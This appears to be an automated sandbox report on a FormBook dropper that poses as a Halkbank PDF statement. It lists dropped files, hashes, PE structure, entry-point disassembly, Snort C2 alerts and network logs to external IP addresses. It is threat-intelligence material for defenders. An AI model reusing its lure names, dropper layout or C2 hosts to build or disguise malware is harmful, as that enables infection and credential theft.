                                                    DHL RECEIPT AWB811470484778.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.147.160
                                                    T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    kftt2DEAWT8UMcm.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.160.129
                                                    T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    33040117281.exeGet hashmaliciousCryptoWallBrowse
                                                    • 66.96.147.114
                                                    Purchase Order Form.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 65.254.248.134
                                                    Lv8QWUVq3P.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.135
                                                    captain.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    cnf13429226.vbsGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.135
                                                    http://img.youtube.com.dollhousedelight.com/.mods/bbb.phpGet hashmaliciousUnknownBrowse
                                                    • 66.96.162.133
                                                    AnQO5F8pVs.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.128
                                                    fWikJEXL2p.elfGet hashmaliciousUnknownBrowse
                                                    • 207.148.241.180
                                                    #U03a0#U03b1#U03c1#U03b1#U03b3#U03b3#U03b5#U03bb#U03af#U03b1 0843.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 66.96.160.155
                                                    file.exeGet hashmaliciousAgentTesla, FormBookBrowse
                                                    • 66.96.162.149
                                                    hIMJgp4RfW.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.147.160
                                                    0900664 MOHS Tender..jsGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    order.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 66.96.162.129

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\-912K03JO

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\colorcpl.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):94208
                                                    Entropy (8bit):1.2880737026424216
                                                    Encrypted:false
                                                    SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                    MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                    SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                    SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                    SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):5915
                                                    Entropy (8bit):7.157482097745004
                                                    Encrypted:false
                                                    SSDEEP:96:Farc6oY3mg/DrYuik2XO5oSw0qZCOtpd/mdIdltd/bEKR6tBLSIxITmgOnewIFcR:FarcRSqhX1SJ7O5/qglv/6B2IxTgb1cR
                                                    MD5:BFC24FD6E69A70B78D387B112A674C87
                                                    SHA1:68FAE5C2D8D1FFD8D31D1C2750AE7CF80A82122B
                                                    SHA-256:387A7FD363C0E27DEA5D1A1BBB4AB93CA9CE80C38DCBDEFA411332896C29FBFC
                                                    SHA-512:D7466FDE7CA71E481580EBB60A6E471A0AD0EF51777CC737ABB65F2B99EC99198A10EAE8C8446A07EE627B4F656091A3A5F7D0FF76F4A27A99900FE2D314C9CE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                    C:\Users\user\AppData\Local\Temp\ngzifdk.p

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210528
                                                    Entropy (8bit):7.998793680310522
                                                    Encrypted:true
                                                    SSDEEP:6144:nRRc7fMj51qLZOiyFkyJPf3hA72XzpPKoEOyx:n/3feIJXxA7cTEOI
                                                    MD5:5AEB5B951D9590CA46194F9AB24FDFD7
                                                    SHA1:66889738A8D35D8E58636B527777DF613E3F12C0
                                                    SHA-256:DD04BFAC4DD4FBFBA2358D448E7A1D55CF6A294F4C59F4FFB0B495DEF98051E1
                                                    SHA-512:4112A429D39D1C2F6BB8CDA4ECD4CFE71CACC88953317753DB1503F0DB5D23E259A5E041FA3B303CB7182DD5B9A819525B0563C128D04DB0A816D8640A6DA86B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.u......]..0_JR...RB..'z].....R..l.*..c..q..W...O.+DdM.&. ..Y..X;.4...m.t,...A&..........Z.^.........z.N.\.M......LpcJ!g<z...c4..5G. p.`....w'......;.4......=..Gzf.H..C.4z.Wr..".R.\G.z(),....^..u.........H.._.'].{ ....}xW{@M.>...qG..*..G..a.....V..h..1v....d......DJ.EB.h.........l *..c..q..W...O.+DaM.&. ....X....].W..HX^.......M...F.=..t...k.;..1.B...>.<..%i....!g<z.......c.(.M.,qTEh..|.uE...Z>.K(.\....H.).8..O%...Wr..".R.r,P..),...^.B.;.|......H..&.K.I..T,..xW{@M.>..RqG...*..S..a$....V.N.hD.1v....]......DJa.B........R..l.*..c..q..W...O.+DdM.&. ....X....].W..HX^.......M...F.=..t...k.;..1.B...>.<..%i....!g<z.......c.(.M.,qTEh..|.uE...Z>.K(.\....H.).8..O%...Wr..".R.\G.z(),.o..^.:.; ......H..&.K.I...,.}xW{@M.>..RqG...*..S..a$....V.N.hD.1v....]......DJa.B........R..l.*..c..q..W...O.+DdM.&. ....X....].W..HX^.......M...F.=..t...k.;..1.B...>.<..%i....!g<z.......c.(.M.,qTEh..|.uE...Z>.K(.\....H.).8..O%...Wr..".R.\G.z(),.o..^.:.; ......H..&.K.I...,.}xW{@M.>.

                                                    C:\Users\user\AppData\Local\Temp\nsvF67E.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):535341
                                                    Entropy (8bit):7.309306707025102
                                                    Encrypted:false
                                                    SSDEEP:12288:J/3feIJXxA7cTEOASg9dfO0v//+UADwP4tU:JffRa7ArefBfDADm4
                                                    MD5:4A28D62EC67A2E5FE6C9C25BDBC9B88B
                                                    SHA1:9FEDF84CDE269C3DFDCA38DF59AE7115E7869D21
                                                    SHA-256:D6D521D162DBB19EBFBC5DD39D118EFC93420524DBB301EBE0860092B36DB8FD
                                                    SHA-512:BBC52BE23A9E296D8AFE51D6061976B2E84B8130576C019FC7423EEC561C2CF786F046FB28C4C524E9D4552BD177367C3A035528A6B224BCDCA409D70A33BBDD
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.7......,........................).......6.......7..............................................................................7...........................................................................................................................................................G...............w...j...............................................................................................................................P...........Q...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\vokkqsp.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):304640
                                                    Entropy (8bit):6.533820014090213
                                                    Encrypted:false
                                                    SSDEEP:3072:FQxfgGjGX0zRSoMqBn70YLLLAYd7/a7+ChY4U8mKQADVIZqX+oYjss4QMfJy+ETf:ofBjGX0vMq/+mZADVaqDS4QMBDyWUJZ
                                                    MD5:D2FAF24547268D9525AE7E78CD4DE87A
                                                    SHA1:EECD83FCA0B5772C22728699AE6AEC2725DEAD04
                                                    SHA-256:781F358357CE4F799737854AF64991142D497E815E3E1E3FF092D7B37EBFF87B
                                                    SHA-512:EF0045E96BB7F11E48A14BCCE3B3B11F96155FE756DF5A84CDC6350E0E9BAE0D33D8AFCD315E58A46286F8873AE4D21EDC8818664C3B840C02CB3E1DA400BC70
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.AT../.../.../...,.../...*.../...+.../...,.../...*.<./...+.../......./......./...'.../......./...-.../.Rich../.........................PE..L......c............................$+............@.............................................................................@....................................{..............................0{..@............................................text............................... ..`.rdata..T...........................@..@.data....0..........................@....gfids..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.949203272102251
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    File size:377609
                                                    MD5:0d84005af71574a568567967e666cda5
                                                    SHA1:22bd76803c3d004f48be0b25ba0ec1920ccc3360
                                                    SHA256:05977847b0408ec1abb7b4cd05ad10b4004c97d5c949e579d695d47518f4f376
                                                    SHA512:46f06628757e858149f8879501f6640de31c175a48f973cadc1ddc5e967bf10bf181101288a76eca1c6844c4cc055077ce8269f6a5d32c925b539b08e3a16db9
                                                    SSDEEP:6144:/Ya6ucWe1LyolA8cR/2eUiYI5fCqz7bIMXomfP4lkqrohrNBprLRVdNjnzO59geb:/YYFSbl5GuezCqnUMX9fwlBrohr3RLRk
                                                    TLSH:4F84231A6BE1A433FC5986316D3B57F398FFDB667166034E13A08A0C783E515CA0E762
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                    File Icon

                                                    Icon Hash:b2a88c96b2ca6a72

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x403640
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:61259b55b8912888e90f516ca08dc514

                                                    Entrypoint Preview

                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 000003F4h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebx, ebx
                                                    push 00008001h
                                                    mov dword ptr [ebp-14h], ebx
                                                    mov dword ptr [ebp-04h], 0040A230h
                                                    mov dword ptr [ebp-10h], ebx
                                                    call dword ptr [004080C8h]
                                                    mov esi, dword ptr [004080CCh]
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    push eax
                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                    mov dword ptr [ebp-2Ch], ebx
                                                    mov dword ptr [ebp-28h], ebx
                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                    call esi
                                                    test eax, eax
                                                    jne 00007F5764E8621Ah
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                    push eax
                                                    call esi
                                                    mov ax, word ptr [ebp-0000012Ch]
                                                    mov ecx, dword ptr [ebp-00000112h]
                                                    sub ax, 00000053h
                                                    add ecx, FFFFFFD0h
                                                    neg ax
                                                    sbb eax, eax
                                                    mov byte ptr [ebp-26h], 00000004h
                                                    not eax
                                                    and eax, ecx
                                                    mov word ptr [ebp-2Ch], ax
                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                    jnc 00007F5764E861EAh
                                                    and word ptr [ebp-00000132h], 0000h
                                                    mov eax, dword ptr [ebp-00000134h]
                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                    mov dword ptr [0042A318h], eax
                                                    xor eax, eax
                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                    movzx eax, ax
                                                    or eax, ecx
                                                    xor ecx, ecx
                                                    mov ch, byte ptr [ebp-2Ch]
                                                    movzx ecx, cx
                                                    shl eax, 10h
                                                    or eax, ecx

                                                    Rich Headers

                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xce0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x3b0000xce00xe00False0.42410714285714285data4.234710426242931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                    RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                    RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                    RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                    RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                    RT_VERSION0x3b7580x248dataEnglishUnited States
                                                    RT_MANIFEST0x3b9a00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                    Imports

                                                    DLLImport
                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    192.168.2.4198.54.117.21249703802031449 02/20/23-11:24:46.771477TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.4198.54.117.212
                                                    192.168.2.4198.54.117.21249703802031412 02/20/23-11:24:46.771477TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.4198.54.117.212
                                                    192.168.2.4198.54.117.21249703802031453 02/20/23-11:24:46.771477TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970380192.168.2.4198.54.117.212
                                                    192.168.2.48.8.8.856572532023883 02/20/23-11:23:29.507639UDP2023883ET DNS Query to a *.top domain - Likely Hostile5657253192.168.2.48.8.8.8

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Feb 20, 2023 11:23:31.021285057 CET4969580192.168.2.4107.148.8.96
                                                    Feb 20, 2023 11:23:31.227570057 CET8049695107.148.8.96192.168.2.4
                                                    Feb 20, 2023 11:23:31.227824926 CET4969580192.168.2.4107.148.8.96
                                                    Feb 20, 2023 11:23:31.242640018 CET4969580192.168.2.4107.148.8.96
                                                    Feb 20, 2023 11:23:31.448879004 CET8049695107.148.8.96192.168.2.4
                                                    Feb 20, 2023 11:23:31.448966026 CET8049695107.148.8.96192.168.2.4
                                                    Feb 20, 2023 11:23:31.449002028 CET8049695107.148.8.96192.168.2.4
                                                    Feb 20, 2023 11:23:31.449132919 CET4969580192.168.2.4107.148.8.96
                                                    Feb 20, 2023 11:23:31.449321985 CET4969580192.168.2.4107.148.8.96
                                                    Feb 20, 2023 11:23:31.655419111 CET8049695107.148.8.96192.168.2.4
                                                    Feb 20, 2023 11:23:36.480048895 CET4969680192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:23:39.468640089 CET4969680192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:23:45.469172955 CET4969680192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:23:58.619883060 CET4969680192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:24:01.626889944 CET4969680192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:24:07.627307892 CET4969680192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:24:21.673051119 CET4969780192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:24:24.738110065 CET4969780192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:24:27.704953909 CET4969880192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:27.880548954 CET8049698184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:27.880650997 CET4969880192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:27.880846977 CET4969880192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:28.056271076 CET8049698184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:28.196916103 CET8049698184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:28.196948051 CET8049698184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:28.196968079 CET8049698184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:28.196989059 CET8049698184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:28.197120905 CET4969880192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:28.197244883 CET4969880192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:28.197280884 CET8049698184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:28.197355986 CET4969880192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:29.396611929 CET4969880192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:30.411048889 CET4969980192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:30.585022926 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:30.585208893 CET4969980192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:30.590812922 CET4969980192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:30.754317999 CET4969780192.168.2.4194.102.227.30
                                                    Feb 20, 2023 11:24:30.764482975 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:30.862343073 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:30.862416029 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:30.862508059 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:30.862557888 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:30.862595081 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:30.862593889 CET4969980192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:30.862641096 CET4969980192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:30.862672091 CET4969980192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:30.863116980 CET4969980192.168.2.4184.94.215.91
                                                    Feb 20, 2023 11:24:31.036923885 CET8049699184.94.215.91192.168.2.4
                                                    Feb 20, 2023 11:24:35.974742889 CET4970080192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:36.078232050 CET804970066.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:36.078423023 CET4970080192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:36.078562021 CET4970080192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:36.182180882 CET804970066.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:36.195274115 CET804970066.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:36.195308924 CET804970066.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:36.195482016 CET4970080192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:37.583137989 CET4970080192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:38.599414110 CET4970180192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:38.713532925 CET804970166.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:38.713752031 CET4970180192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:38.713886023 CET4970180192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:38.827898026 CET804970166.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:38.843964100 CET804970166.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:38.844032049 CET804970166.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:38.844248056 CET4970180192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:38.845201969 CET4970180192.168.2.466.96.162.149
                                                    Feb 20, 2023 11:24:38.958662987 CET804970166.96.162.149192.168.2.4
                                                    Feb 20, 2023 11:24:43.903126001 CET4970280192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:44.074330091 CET8049702198.54.117.212192.168.2.4
                                                    Feb 20, 2023 11:24:44.074477911 CET4970280192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:44.074593067 CET4970280192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:44.245832920 CET8049702198.54.117.212192.168.2.4
                                                    Feb 20, 2023 11:24:44.245893955 CET8049702198.54.117.212192.168.2.4
                                                    Feb 20, 2023 11:24:44.245934010 CET8049702198.54.117.212192.168.2.4
                                                    Feb 20, 2023 11:24:44.246040106 CET4970280192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:45.583760023 CET4970280192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:46.599931002 CET4970380192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:46.770838976 CET8049703198.54.117.212192.168.2.4
                                                    Feb 20, 2023 11:24:46.771013975 CET4970380192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:46.771476984 CET4970380192.168.2.4198.54.117.212
                                                    Feb 20, 2023 11:24:46.942133904 CET8049703198.54.117.212192.168.2.4
                                                    Feb 20, 2023 11:24:46.942163944 CET8049703198.54.117.212192.168.2.4
                                                    Feb 20, 2023 11:24:52.200989008 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:52.217001915 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.217097044 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:52.217389107 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:52.233263016 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751462936 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751564980 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751612902 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751674891 CET804970466.235.200.146192.168.2.4
